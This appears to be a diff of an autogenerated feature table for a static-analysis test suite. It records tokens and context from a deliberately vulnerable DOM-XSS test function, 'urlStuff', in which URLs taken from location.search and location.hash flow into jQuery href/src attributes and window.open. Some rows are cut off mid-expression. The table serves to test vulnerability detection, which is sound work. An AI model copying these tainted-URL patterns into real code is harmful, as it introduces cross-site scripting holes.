URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:21 | win | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:21 | win | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:21 | win | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:21 | win | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:30 | win.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:30 | win.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:30 | win.location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:30 | win.location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:30 | win.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | InputAccessPathFromCallee | 1.href | | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | InputArgumentIndex | 1 | @@ -17912,6 +123901,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:477:19:477:35 | win.location.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:23:477:30 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:23:477:30 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:23:477:30 | location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:23:477:30 | location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:23:477:30 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:32:477:35 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:32:477:35 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:32:477:35 | href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:32:477:35 | href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:32:477:35 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:39:477:46 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:39:477:46 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:39:477:46 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:39:477:46 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:39:477:46 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17919,6 +123923,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:477:48:477:53 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:47 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:47 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:47 | exceptional return of $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:56 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:64 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:3:479:64 | exceptional return of $("" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:479:5:479:11 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:479:5:479:11 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17933,6 +123967,27 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:479:14:479:46 | {src: " ... + url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:479:14:479:46 | {src: " ... + url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:479:14:479:46 | {src: " ... + url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:17 | src | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:17 | src | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:17 | src | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:17 | src | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:17 | src | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:15:479:45 | src: "h ... " + url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:20:479:39 | "http://google.com/" | stringConcatenatedWith | -endpoint- url | | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | InputAccessPathFromCallee | 1.src | | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | InputArgumentIndex | 1 | @@ -17942,6 +123997,17 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:479:20:479:45 | "http:/ ... " + url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:479:43:479:45 | url | stringConcatenatedWith | 'http://google.com/' -endpoint- | +| autogenerated/Xss/DomBasedXss/tst.js:479:49:479:56 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:479:49:479:56 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:479:49:479:56 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:479:49:479:56 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:479:49:479:56 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17949,6 +124015,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:479:58:479:63 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:57 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:57 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:57 | exceptional return of $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:66 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:3:481:74 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| 